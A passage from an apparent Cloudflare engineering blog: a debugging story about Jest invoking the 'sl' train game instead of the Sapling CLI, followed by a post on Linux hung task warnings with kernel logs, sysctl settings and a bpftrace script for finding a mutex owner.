\n \n
When I first saw that Jest was running sl
so many times, my first thought was to ask my colleague if sl
is a valid command on his Mac, and of course it is not. After all, which serious engineer would stuff their machine full of silly commands like sl
, gti
, cowsay
, or toilet
? The next thing I tried was to rename sl
to something else, and sure enough all my problems disappeared: yarn test
started working perfectly.
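If you want to reproduce that step, something like the following works on a Debian-style setup where the game lives in /usr/games (paths may differ on your system; sl.actual is the name the wrapper script further down expects):

🌈 ~ command -v sl
/usr/games/sl
🌈 ~ sudo mv /usr/games/sl /usr/games/sl.actual   # park the locomotive outside of Jest's reach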
\n
So what does Jest have to do with Steam Locomotives?
\n \n \n \n
\n
Nothing, that’s what. The whole affair is an unfortunate naming clash between sl
the Steam Locomotive and sl
the Sapling CLI. Jest wanted sl
the source control system, but ended up getting steam-rolled by sl
the Steam Locomotive.
\n
Fortunately the devs took it in good humor, and made a (still unreleased) fix. Check out the train memes!
\n
\n
At this point the main story has ended. However, there are still some unresolved nagging questions, like…
\n
How did the crash arrive at the magic number of a relatively even 27 seconds?
\n \n \n \n
\n
I don’t know. Actually I’m not sure if a forked child executing sl
still has a terminal anymore, but the travel time of the train does depend on the terminal width. The wider it is, the longer it takes:
\n
🌈 ~ tput cols
425
🌈 ~ time sl
sl 0.19s user 0.06s system 1% cpu 20.629 total
🌈 ~ tput cols
58
🌈 ~ time sl
sl 0.03s user 0.01s system 0% cpu 5.695 total
\n
So the first thing I tried was to run yarn test in a ridiculously narrow terminal and see what happens:
\n
Determin
ing test
 suites 
to run..
. 
 
 ● Test
 suite f
ailed to
 run 
 
thrown: 
[Error] 
 
error Co
mmand fa
iled wit
h exit c
ode 1. 
info Vis
it https
://yarnp
kg.com/e
n/docs/c
li/run f
or docum
entation
 about t
his comm
and. 
yarn tes
t 1.92s
 user 0.
67s syst
em 9% cp
u 27.088
 total 
🌈 back
stage [m
aster] t
put cols
 
8
\n
Alas, the terminal width doesn’t affect jest at all. Jest calls sl via execa
so let’s mock that up locally:
\n
🌈 choochoo cat runSl.mjs 
import {execa} from 'execa';
const { stdout } = await execa('tput', ['cols']);
console.log('terminal colwidth:', stdout);
await execa('sl', ['root']);
🌈 choochoo time node runSl.mjs
terminal colwidth: 80
node runSl.mjs 0.21s user 0.06s system 4% cpu 6.730 total
\n
So execa
uses the default terminal width of 80, which takes the train 6.7 seconds to cross. And 27 seconds divided by 6.7 is awfully close to 4. So is Jest running sl
4 times? Let’s do a poor man’s bpftrace by hooking into sl
like so:
\n
#!/bin/bash

uniqid=$RANDOM
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started" >> /home/yew/executed.log
/usr/games/sl.actual "$@"
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid ended" >> /home/yew/executed.log
\n
And if we check executed.log
, sl
is indeed executed in 4 waves, albeit by 5 workers simultaneously in each wave:
\n
#wave1
2025-03-20 13:23:57.125482563 21049 started
2025-03-20 13:23:57.127526987 21666 started
2025-03-20 13:23:57.131099388 4897 started
2025-03-20 13:23:57.134237754 102 started
2025-03-20 13:23:57.137091737 15733 started
#wave1 ends, wave2 starts
2025-03-20 13:24:03.704588580 21666 ended
2025-03-20 13:24:03.704621737 21049 ended
2025-03-20 13:24:03.707780748 4897 ended
2025-03-20 13:24:03.712086346 15733 ended
2025-03-20 13:24:03.711953000 102 ended
2025-03-20 13:24:03.714831149 18018 started
2025-03-20 13:24:03.721293279 23293 started
2025-03-20 13:24:03.724600164 27918 started
2025-03-20 13:24:03.729763900 15091 started
2025-03-20 13:24:03.733176122 18473 started
#wave2 ends, wave3 starts
2025-03-20 13:24:10.294286746 18018 ended
2025-03-20 13:24:10.297261754 23293 ended
2025-03-20 13:24:10.300925031 27918 ended
2025-03-20 13:24:10.300950334 15091 ended
2025-03-20 13:24:10.303498710 24873 started
2025-03-20 13:24:10.303980494 18473 ended
2025-03-20 13:24:10.308560194 31825 started
2025-03-20 13:24:10.310595182 18452 started
2025-03-20 13:24:10.314222848 16121 started
2025-03-20 13:24:10.317875812 30892 started
#wave3 ends, wave4 starts
2025-03-20 13:24:16.883609316 24873 ended
2025-03-20 13:24:16.886708598 18452 ended
2025-03-20 13:24:16.886867725 31825 ended
2025-03-20 13:24:16.890735338 16121 ended
2025-03-20 13:24:16.893661911 21975 started
2025-03-20 13:24:16.898525968 30892 ended
#crash imminent! wave4 ending, wave5 starting...
2025-03-20 13:24:23.474925807 21975 ended
\n
The logs were emitted for about 26.35 seconds, which is close to 27. It probably crashed just as wave4 was reporting back. And each wave lasts about 6.7 seconds, right on the money with manual measurement.
\n
So why is Jest running sl in 4 waves? Why did it crash at the start of the 5th wave?
\n \n \n \n
\n
Let’s again modify the poor man’s bpftrace to also log the args and working directory:
\n
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started: $@ at $PWD" >> /home/yew/executed.log
\n
From the results we can see that the 5 workers are busy executing sl root
, which corresponds to the getRoot()
function in jest-changed-files/sl.ts
\n
2025-03-21 05:50:22.663263304 started: root at /home/yew/cloudflare/repos/backstage/packages/app/src
2025-03-21 05:50:22.665550470 started: root at /home/yew/cloudflare/repos/backstage/packages/backend/src
2025-03-21 05:50:22.667988509 started: root at /home/yew/cloudflare/repos/backstage/plugins/access/src
2025-03-21 05:50:22.671781519 started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-components/src
2025-03-21 05:50:22.673690514 started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-entities/src
2025-03-21 05:50:29.247573899 started: root at /home/yew/cloudflare/repos/backstage/plugins/catalog-types-common/src
2025-03-21 05:50:29.251173536 started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects/src
2025-03-21 05:50:29.255263605 started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects-backend/src
2025-03-21 05:50:29.257293780 started: root at /home/yew/cloudflare/repos/backstage/plugins/pingboard-backend/src
2025-03-21 05:50:29.260285783 started: root at /home/yew/cloudflare/repos/backstage/plugins/resource-insights/src
2025-03-21 05:50:35.823374079 started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-gaia/src
2025-03-21 05:50:35.825418386 started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-r2/src
2025-03-21 05:50:35.829963172 started: root at /home/yew/cloudflare/repos/backstage/plugins/security-scorecard-dash/src
2025-03-21 05:50:35.832597778 started: root at /home/yew/cloudflare/repos/backstage/plugins/slo-directory/src
2025-03-21 05:50:35.834631869 started: root at /home/yew/cloudflare/repos/backstage/plugins/software-excellence-dashboard/src
2025-03-21 05:50:42.404063080 started: root at /home/yew/cloudflare/repos/backstage/plugins/teamcity/src
\n
The 16 entries here correspond neatly to the 16 rootDirs
configured in Jest for Cloudflare’s backstage. We have 5 trains, and we want to visit 16 stations so let’s do some simple math. 16/5.0 = 3.2 which means our trains need to go back and forth 4 times at a minimum to cover them all.
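The back-of-the-envelope version of that, as integer ceiling division in shell (16 stations divided among 5 trains):

🌈 ~ echo $(( (16 + 5 - 1) / 5 ))
4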
\n
Final mystery: Why did it crash?
\n \n \n \n
\n
Let’s go back to the very start of our journey. The original [Error]
thrown was actually from here and after modifying node_modules/jest-changed-files/index.js
, I found that the error is shortMessage: 'Command failed with ENAMETOOLONG: sl status...', and the reason why became clear when I interrogated Jest about what it thinks the repos are.
While the git repo is what you’d expect, the sl “repo” looks amazingly like a train wreck in motion:
\n
got repos.git as Set(1) { '/home/yew/cloudflare/repos/backstage' }\ngot repos.sl as Set(1) {\n '\\x1B[?1049h\\x1B[1;24r\\x1B[m\\x1B(B\\x1B[4l\\x1B[?7h\\x1B[?25l\\x1B[H\\x1B[2J\\x1B[15;80H_\\x1B[15;79H_\\x1B[16d|\\x1B[9;80H_\\x1B[12;80H|\\x1B[13;80H|\\x1B[14;80H|\\x1B[15;78H__/\\x1B[16;79H|/\\x1B[17;80H\\\\\\x1B[9;\n 79H_D\\x1B[10;80H|\\x1B[11;80H/\\x1B[12;79H|\\x1B[K\\x1B[13d\\b|\\x1B[K\\x1B[14d\\b|/\\x1B[15;1H\\x1B[1P\\x1B[16;78H|/-\\x1B[17;79H\\\\_\\x1B[9;1H\\x1B[1P\\x1B[10;79H|(\\x1B[11;79H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\x1B[14;1H\\x1B[1P\\x1B[15;76H__/ =\\x1B[16;77H|/-=\\x1B[17;78H\\\\_/\\x1B[9;77H_D _\\x1B[10;78H|(_\\x1B[11;78H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b| _\\x1B[14;77H"https://blog.cloudflare.com/"\\x1B[15;75H__/\n =|\\x1B[16;76H|/-=|\\x1B[17;1H\\x1B[1P\\x1B[8;80H=\\x1B[9;76H_D _|\\x1B[10;77H|(_)\\x1B[11;77H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\r\\x1B[14d\\x1B[1P\\x1B[15d\\x1B[1P\\x1B[16;75H|/-=|_\\x1B[17;1H\\x1B[1P\\x1B[8;79H=\\r\\x1B[9d\\x1B[1P\\x1B[10;76H|(_)-\\x1B[11;76H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b| _\\r\\x1B[14d\\x1B[1P\\x1B[15;73H__/ =|\n o\\x1B[16;74H|/-=|_\\r\\x1B[17d\\x1B[1P\\x1B[8;78H=\\r\\x1B[9d\\x1B[1P\\x1B[10;75H|(_)-\\x1B[11;75H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\r\\x1B[14d\\x1B[1P\\x1B[15d\\x1B[1P\\x1B[16;73H|/-=|_\\r\\x1B[17d\\x1B[1P\\x1B[8;77H=\\x1B[9;73H_D _| |\\x1B[10;74H|(_)-\\x1B[11;74H/ |\\x1B[12;73H| |\\x1B[13;73H| _\\x1B[14;73H"https://blog.cloudflare.com/" |\\x1B[15;71H__/\n =| o |\\x1B[16;72H|/-=|___|\\x1B[17;1H\\x1B[1P\\x 1B[5;79H(@\\x1B[7;77H(\\r\\x1B[8d\\x1B[1P\\x1B[9;72H_D _| |_\\x1B[10;1H\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;72H| _\\x1B[14;72H"https://blog.cloudflare.com/" |-\\x1B[15;70H__/\n =| o |=\\x1B[16;71H|/-=|___|=\\x1B[17;1H\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;71H_D _| |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;71H| _\\x1B[14;71H"https://blog.cloudflare.com/" |-\\x1B[15;69H__/ =| o\n |=-\\x1B[16;70H|/-=|___|=O\\x1B[17;71H\\\\_/ \\\\\\x1B[8;1H\\x1B[1P\\x1B[9;70H_D _| |_\\x1B[10;71H|(_)--- |\\x1B[11;71H/ | |\\x1B[12;70H| | |\\x1B[13;70H| _\\x1B[80G|\\x1B[14;70H"https://blog.cloudflare.com/"\n |-\\x1B[15;68H__/ =| o |=-~\\x1B[16;69H|/-=|___|=\\x1B[K\\x1B[17;70H\\\\_/ \\\\O\\x1B[8;1H\\x1B[1P\\x1B[9;69H_D _| |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;69H| _\\x1B[79G|_\\x1B[14;69H"https://blog.cloudflare.com/"\n |-\\x1B[15;67H__/ =| o |=-~\\r\\x1B[16d\\x1B[1P\\x1B[17;69H\\\\_/ \\\\_\\x1B[4d\\b\\b(@@\\x1B[5;75H( )\\x1B[7;73H(@@@)\\r\\x1B[8d\\x1B[1P\\x1B[9;68H_D _|\n |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;68H| _\\x1B[78G|_\\x1B[14;68H"https://blog.cloudflare.com/" |-\\x1B[15;66H__/ =| o |=-~~\\\\\\x1B[16;67H|/-=|___|= O\\x1B[17;68H\\\\_/ \\\\__/\\x1B[8;1H\\x1B[1P\\x1B[9;67H_D _|\n |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;67H| _\\x1B[77G|_\\x1B[14;67H"https://blog.cloudflare.com/" |-\\x1B[15;65H__/ =| o |=-~O==\\x1B[16;66H|/-=|___|= |\\x1B[17;1H\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;66H_D _|\n |_\\x1B[10;67H|(_)--- | H\\x1B[11;67H/ | | H\\x1B[12;66H| | | H\\x1B[13;66H| _\\x1B[76G|___H\\x1B[14;66H"https://blog.cloudflare.com/" |-\\x1B[15;64H__/ =| o |=-O==\\x1B[16;65H|/-=|___|=\n |\\r\\x1B[17d\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;65H_D _| |_\\x1B[80G/\\x1B[10;66H|(_)--- | H\\\\\\x1B[11;1H\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;65H| _\\x1B[75G|___H_\\x1B[14;65H"https://blog.cloudflare.com/" |-\\x1B[15;63H__/ =| o |=-~~\\\\\n /\\x1B[16;64H|/-=|___|=O=====O\\x1B[17;65H\\\\_/ \\\\__/ 
\\\\\\x1B[1;4r\\x1B[4;1H\\n' + '\\x1B[1;24r\\x1B[4;74H( )\\x1B[5;71H(@@@@)\\x1B[K\\x1B[7;69H( )\\x1B[K\\x1B[8;68H====\n \\x1B[80G_\\x1B[9;1H\\x1B[1P\\x1B[10;65H|(_)--- | H\\\\_\\x1B[11;1H\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;64H| _\\x1B[74G|___H_\\x1B[14;64H"https://blog.cloudflare.com/" |-\\x1B[15;62H__/ =| o |=-~~\\\\ /~\\x1B[16;63H|/-=|___|=\n ||\\x1B[K\\x1B[17;64H\\\\_/ \\\\O=====O\\x1B[8;67H==== \\x1B[79G_\\r\\x1B[9d\\x1B[1P\\x1B[10;64H|(_)--- | H\\\\_\\x1B[11;64H/ | | H |\\x1B[12;63H| | | H |\\x1B[13;63H|\n _\\x1B[73G|___H__/\\x1B[14;63H"https://blog.cloudflare.com/" |-\\x1B[15;61H__/ =| o |=-~~\\\\ /~\\r\\x1B[16d\\x1B[1P\\x1B[17;63H\\\\_/ \\\\_\\x1B[8;66H==== \\x1B[78G_\\r\\x1B[9d\\x1B[1P\\x1B[10;63H|(_)--- |\n H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;62H| | | H |_\\x1B[13;62H| _\\x1B[72G|___H__/_\\x1B[14;62H"https://blog.cloudflare.com/" |-\\x1B[15;60H__/ =| o |=-~~\\\\ /~~\\\\\\x1B[16;61H|/-=|___|= O=====O\\x1B[17;62H\\\\_/ \\\\__/\n \\\\__/\\x1B[8;65H==== \\x1B[77G_\\r\\x1B[9d\\x1B[1P\\x1B[10;62H|(_)--- | H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;61H| | | H |_\\x1B[13;61H| _\\x1B[71G|___H__/_\\x1B[14;61H"https://blog.cloudflare.com/" |-\\x1B[80GI\\x1B[15;59H__/ =|\n o |=-~O=====O==\\x1B[16;60H|/-=|___|= || |\\x1B[17;1H\\x1B[1P\\x1B[2;79H(@\\x1B[3;74H( )\\x1B[K\\x1B[4;70H(@@@@)\\x1B[K\\x1B[5;67H( )\\x1B[K\\x1B[7;65H(@@@)\\x1B[K\\x1B[8;64H====\n \\x1B[76G_\\r\\x1B[9d\\x1B[1P\\x1B[10;61H|(_)--- | H\\\\_\\x1B[11;61H/ | | H | |\\x1B[12;60H| | | H |__-\\x1B[13;60H| _\\x1B[70G|___H__/__|\\x1B[14;60H"https://blog.cloudflare.com/" |-\\x1B[79GI_\\x1B[15;58H__/ =| o\n |=-O=====O==\\x1B[16;59H|/-=|___|= || |\\r\\x1B[17d\\x1B[1P\\x1B[8;63H==== \\x1B[75G_\\r\\x1B[9d\\x1B[1P\\x1B[10;60H|(_)--- | H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;59H| | | H |__-\\x1B[13;59H|\n _\\x1B[69G|___H__/__|_\\x1B[14;59H"https://blog.cloudflare.com/" |-\\x1B[78GI_\\x1B[15;57H__/ =| o |=-~~\\\\ /~~\\\\ /\\x1B[16;58H|/-=|___|=O=====O=====O\\x1B[17;59H\\\\_/ \\\\__/ \\\\__/ \\\\\\x1B[8;62H====\n \\x1B[74G_\\r\\x1B[9d\\x1B[1P\\x1B[10;59H|(_)--- | H\\\\_\\r\\x1B | | H |__-\\x1B[13;58H| _\\x1B[68G|___H__/__|_\\x1B[14;58H"https://blog.cloudflare.com/" |-\\x1B[77GI_\\x1B[15;56H__/ =| o |=-~~\\\\ /~~\\\\ /~\\x1B[16;57H|/-=|___|=\n || ||\\x1B[K\\x1B[17;58H\\\\_/ \\\\O=====O=====O\\x1B[8;61H==== \\x1B[73G_\\r\\x1B[9d\\x1B[1P\\x1B[10;58H|(_)--- _\\x1B[67G|___H__/__|_\\x1B[14;57H"https://blog.cloudflare.com/" |-\\x1B[76GI_\\x1B[15;55H__/ =| o |=-~~\\\\ /~~\\\\\n /~\\r\\x1B[16d\\x1B[1P\\x1B[17;57H\\\\_/ \\\\_\\x1B[2;75H( ) (\\x1B[3;70H(@@@)\\x1B[K\\x1B[4;66H()\\x1B[K\\x1B[5;63H(@@@@)\\x1B[
\n \n
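That multi-kilobyte blob of escape codes is presumably what then gets used as a repository path, and Linux rejects any single path component longer than NAME_MAX (255 bytes) or any path longer than PATH_MAX (4096 bytes) with ENAMETOOLONG. A contrived shell illustration of the same failure (the generated name here is hypothetical, not Jest's actual argument):

🌈 ~ cd "$(printf 'x%.0s' {1..5000})"   # any syscall fed this "path" fails with ENAMETOOLONG (File name too long)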
Acknowledgements
\n \n \n \n
\n
Thank you to my colleagues Mengnan Gong and Shuhao Zhang, whose ideas and perspectives helped narrow down the root causes of this mystery.
If you enjoy troubleshooting weird and tricky production issues, our engineering teams are hiring.
Searching for the cause of hung tasks in the Linux kernel
Depending on your configuration, the Linux kernel can produce a hung task warning message in its log. Searching the Internet and the kernel documentation, you can find a brief explanation that the process is stuck in the uninterruptible state and hasn’t been scheduled on the CPU for an unexpectedly long period of time. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the hung task warning works, why it happens, whether it is a bug in the Linux kernel or the application itself, and whether it is worth monitoring at all.
\n
INFO: task XXX:1495882 blocked for more than YYY seconds.
\n \n \n \n
\n
The hung task message in the kernel log looks like this:
\n
INFO: task XXX:1495882 blocked for more than YYY seconds.
 Tainted: G O 6.6.39-cloudflare-2024.7.3 #1
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:XXX state:D stack:0 pid:1495882 ppid:1 flags:0x00004002
. . .
\n
Processes in Linux can be in different states. Some of them are running or ready to run on the CPU — they are in the TASK_RUNNING
state. Others are waiting for some signal or event to happen, e.g. network packets to arrive or terminal input from a user. They are in a TASK_INTERRUPTIBLE
state and can spend an arbitrary length of time in this state until being woken up by a signal. The most important thing about these states is that they still can receive signals, and be terminated by a signal. In contrast, a process in the TASK_UNINTERRUPTIBLE
state is waiting only for certain special classes of events to wake them up, and can’t be interrupted by a signal. The signals are not delivered until the process emerges from this state and only a system reboot can clear the process. It’s marked with the letter D
in the log shown above.
What if this wake up event doesn’t happen or happens with a significant delay? (A “significant delay” may be on the order of seconds or minutes, depending on the system.) Then our dependent process is hung in this state. What if this dependent process holds some lock and prevents other processes from acquiring it? Or if we see many processes in the D state? Then it might tell us that some of the system resources are overwhelmed or are not working correctly. At the same time, this state is very valuable, especially if we want to preserve the process memory. It might be useful if part of the data is written to disk and another part is still in the process memory — we don’t want inconsistent data on a disk. Or maybe we want a snapshot of the process memory when the bug is hit. To preserve this behaviour, but make it more controlled, a new state was introduced in the kernel: TASK_KILLABLE
— it still protects a process, but allows termination with a fatal signal.
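If you are curious whether anything on your own system is sitting in that state right now, a quick (and slightly crude) way to list it is:

# show processes whose state starts with D (uninterruptible sleep), plus the header row
$ ps -eo pid,stat,wchan:32,comm | awk 'NR==1 || $2 ~ /^D/'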
\n
How Linux identifies the hung process
\n \n \n \n
\n
The Linux kernel has a special thread called khungtaskd
. It runs regularly depending on the settings, iterating over all processes in the D
state. If a process is in this state for more than YYY seconds, we’ll see a message in the kernel log. There are settings for this daemon that can be changed according to your wishes:
\n
$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 10
kernel.hung_task_warnings = 200
\n
At Cloudflare, we changed the notification threshold kernel.hung_task_timeout_secs
from the default 120 seconds to 10 seconds. You can adjust the value for your system depending on configuration and how critical this delay is for you. If the process spends more than hung_task_timeout_secs
seconds in the D state, a log entry is written, and our internal monitoring system emits an alert based on this log. Another important setting here is kernel.hung_task_warnings
— the total number of messages that will be sent to the log. We limit it to 200 messages and reset it every 15 minutes. It allows us not to be overwhelmed by the same issue, and at the same time doesn’t stop our monitoring for too long. You can make it unlimited by setting the value to “-1”.
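For reference, both knobs can be changed at runtime like any other sysctl (drop them into /etc/sysctl.d/ to make them persistent across reboots):

$ sudo sysctl -w kernel.hung_task_timeout_secs=10
$ sudo sysctl -w kernel.hung_task_warnings=200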
To better understand the root causes of the hung tasks and how a system can be affected, we’re going to review more detailed examples.
\n
Example #1 or XFS
\n \n \n \n
\n
Typically, there is a meaningful process or application name in the log, but sometimes you might see something like this:
\n
INFO: task kworker/13:0:834409 blocked for more than 11 seconds.
  Tainted: G  O  6.6.39-cloudflare-2024.7.3 #1
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:kworker/13:0 state:D stack:0  pid:834409 ppid:2 flags:0x00004000
Workqueue: xfs-sync/dm-6 xfs_log_worker
\n
In this log, kworker
is the kernel thread. It’s used as a deferring mechanism, meaning a piece of work will be scheduled to be executed in the future. Under kworker
, the work is aggregated from different tasks, which makes it difficult to tell which application is experiencing a delay. Luckily, the kworker
is accompanied by the Workqueue
line. Workqueue
is a linked list, usually predefined in the kernel, where these pieces of work are added and performed by the kworker
in the order they were added to the queue. The Workqueue
name xfs-sync
and the function which it points to, xfs_log_worker
, might give a good clue where to look. Here we can make an assumption that XFS is under pressure and check the relevant metrics. It helped us to discover that, due to some configuration changes, we had forgotten to set the no_read_workqueue / no_write_workqueue flags that were introduced some time ago to speed up Linux disk encryption.
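For context, those flags are applied per encrypted device; with a reasonably recent cryptsetup they can be re-applied to a live mapping with something like the following (the mapping name encrypted-disk is hypothetical):

# re-enable the performance flags on an already-open dm-crypt device
$ sudo cryptsetup refresh --perf-no_read_workqueue --perf-no_write_workqueue encrypted-disk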
Summary: In this case, nothing critical happened to the system, but the hung tasks warnings gave us an alert that our file system had slowed down.
\n
Example #2 or Coredump
\n \n \n \n
\n
Let’s take a look at the next hung task log and its decoded stack trace:
\n
INFO: task test:964 blocked for more than 5 seconds.
 Not tainted 6.6.72-cloudflare-2025.1.7 #1
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test state:D stack:0 pid:964 ppid:916 flags:0x00004000
Call Trace:
<TASK>
__schedule (linux/kernel/sched/core.c:5378 linux/kernel/sched/core.c:6697) 
schedule (linux/arch/x86/include/asm/preempt.h:85 (discriminator 13) linux/kernel/sched/core.c:6772 (discriminator 13)) 
do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4)) 
? finish_task_switch.isra.0 (linux/arch/x86/include/asm/irqflags.h:42 linux/arch/x86/include/asm/irqflags.h:77 linux/kernel/sched/sched.h:1385 linux/kernel/sched/core.c:5132 linux/kernel/sched/core.c:5250) 
do_group_exit (linux/kernel/exit.c:1005) 
get_signal (linux/kernel/signal.c:2869) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_try_to_cancel.part.0 (linux/kernel/time/hrtimer.c:1347) 
arch_do_signal_or_restart (linux/arch/x86/kernel/signal.c:310) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
? hrtimer_nanosleep (linux/kernel/time/hrtimer.c:2105) 
exit_to_user_mode_prepare (linux/kernel/entry/common.c:176 linux/kernel/entry/common.c:210) 
syscall_exit_to_user_mode (linux/arch/x86/include/asm/entry-common.h:91 linux/kernel/entry/common.c:141 linux/kernel/entry/common.c:304) 
? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) 
do_syscall_64 (linux/arch/x86/entry/common.c:88) 
entry_SYSCALL_64_after_hwframe (linux/arch/x86/entry/entry_64.S:121) 
</TASK>
\n
The stack trace says that the process or application test
was blocked for more than 5 seconds
. We might recognise this user space application by the name, but why is it blocked? It’s always helpful to check the stack trace when looking for a cause. The most interesting line here is do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4))
. The source code points to the coredump_task_exit
function. Additionally, checking the process metrics revealed that the application crashed at the time the warning message appeared in the log. When a process is terminated abnormally by certain signals, the Linux kernel can provide a core dump file, if enabled. The mechanism works as follows: when the process terminates, the kernel makes a snapshot of the process memory before exiting and either writes it to a file or sends it through a socket to another handler — which can be systemd-coredump or your own custom one. While this happens, the kernel keeps the process in the D state to preserve its memory and protect it from early termination. The higher the process memory usage, the longer it takes to produce the core dump file, and the higher the chance of getting a hung task warning.
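Whether that snapshot goes straight to a file or to a user space handler is controlled by kernel.core_pattern, which you can inspect directly:

# a leading '|' in the pattern means the dump is piped to a handler such as systemd-coredump,
# otherwise it is written to a file matching the pattern
$ cat /proc/sys/kernel/core_pattern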
Let’s check our hypothesis by triggering it with a small Go program. We’ll use the default Linux coredump handler and will decrease the hung task threshold to 1 second.
Coredump settings:
\n
$ sudo sysctl -a --pattern kernel.core
kernel.core_pattern = core
kernel.core_pipe_limit = 16
kernel.core_uses_pid = 1
\n
You can make changes with sysctl:
\n
$ sudo sysctl -w kernel.core_uses_pid=1
\n
Hung task settings:
\n
$ sudo sysctl -a --pattern hung
kernel.hung_task_all_cpu_backtrace = 0
kernel.hung_task_check_count = 4194304
kernel.hung_task_check_interval_secs = 0
kernel.hung_task_panic = 0
kernel.hung_task_timeout_secs = 1
kernel.hung_task_warnings = -1
\n
Go program:
\n
$ cat main.go
package main

import (
    "os"
    "time"
)

func main() {
    _, err := os.ReadFile("test.file")
    if err != nil {
        panic(err)
    }
    time.Sleep(8 * time.Minute)
}
\n
This program reads a 10 GB file into process memory. Let’s create the file:
\n
$ yes this is 10GB file | head -c 10GB > test.file
\n
The last step is to build the Go program, crash it, and watch our kernel log:
\n
$ go mod init test
$ go build .
$ GOTRACEBACK=crash ./test
$ (Ctrl+\)
\n
Hooray! We can see our hung task warning:
\n
$ sudo dmesg -T | tail -n 31
INFO: task test:8734 blocked for more than 22 seconds.
 Not tainted 6.6.72-cloudflare-2025.1.7 #1
 Blocked by coredump.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
task:test state:D stack:0 pid:8734 ppid:8406 task_flags:0x400448 flags:0x00004000
\n
By the way, have you noticed the Blocked by coredump.
line in the log? It was recently added to the upstream code to improve visibility and remove the blame from the process itself. The patch also added the task_flags
information, as Blocked by coredump
is detected via the flag PF_POSTCOREDUMP
, and knowing all the task flags is useful for further root-cause analysis.
Summary: This example showed that even if everything suggests that the application is the problem, the real root cause can be something else — in this case, coredump
.
\n
Example #3 or rtnl_mutex
\n \n \n \n
\n
This one was tricky to debug. Usually, the alerts are limited by one or two different processes, meaning only a certain application or subsystem experiences an issue. In this case, we saw dozens of unrelated tasks hanging for minutes with no improvements over time. Nothing else was in the log, most of the system metrics were fine, and existing traffic was being served, but it was not possible to ssh to the server. New Kubernetes container creations were also stalling. Analyzing the stack traces of different tasks initially revealed that all the traces were limited to just three functions:
\n
rtnetlink_rcv_msg+0x9/0x3c0
dev_ethtool+0xc6/0x2db0
bonding_show_bonds+0x20/0xb0
\n
Further investigation showed that all of these functions were waiting for rtnl_lock
to be acquired. It looked like some application acquired the rtnl_mutex
and didn’t release it. All other processes were in the D
state waiting for this lock.
The RTNL lock is primarily used by the kernel networking subsystem for any network-related config, for both writing and reading. The RTNL is a global mutex lock, although upstream efforts are being made for splitting up RTNL per network namespace (netns).
From the hung task reports, we can observe the “victims” that are being stalled waiting for the lock, but how do we identify the task that is holding this lock for too long? For troubleshooting this, we leveraged BPF
via a bpftrace
script, as this allows us to inspect the running kernel state. The kernel’s mutex implementation has a struct member called owner
. It contains a pointer to the task_struct
from the mutex-owning process, except it is encoded as type atomic_long_t
. This is because the mutex implementation stores some state information in the lower 3-bits (mask 0x7) of this pointer. Thus, to read and dereference this task_struct
pointer, we must first mask off the lower bits (0x7).
Our bpftrace
script to determine who holds the mutex is as follows:
\n
#!/usr/bin/env bpftrace
interval:s:10 {
    $rtnl_mutex = (struct mutex *) kaddr("rtnl_mutex");
    $owner = (struct task_struct *) ($rtnl_mutex->owner.counter & ~0x07);
    if ($owner != 0) {
        printf("rtnl_mutex->owner = %u %s\n", $owner->pid, $owner->comm);
    }
}
\n
In this script, the rtnl_mutex
lock is a global lock whose address can be exposed via /proc/kallsyms
– using bpftrace
helper function kaddr()
, we can access the struct mutex pointer from the kallsyms
. Thus, we can periodically (via interval:s:10
) check if someone is holding this lock.
In the output we had this:
\n
rtnl_mutex->owner = 3895365 calico-node
\n
This allowed us to quickly identify calico-node
as the process holding the RTNL lock for too long. To quickly observe where this process itself is stalled, the call stack is available via /proc/3895365/stack
. This showed us that the root cause was a Wireguard config change, with function wg_set_device()
holding the RTNL lock, and peer_remove_after_dead()
waiting too long for a napi_disable()
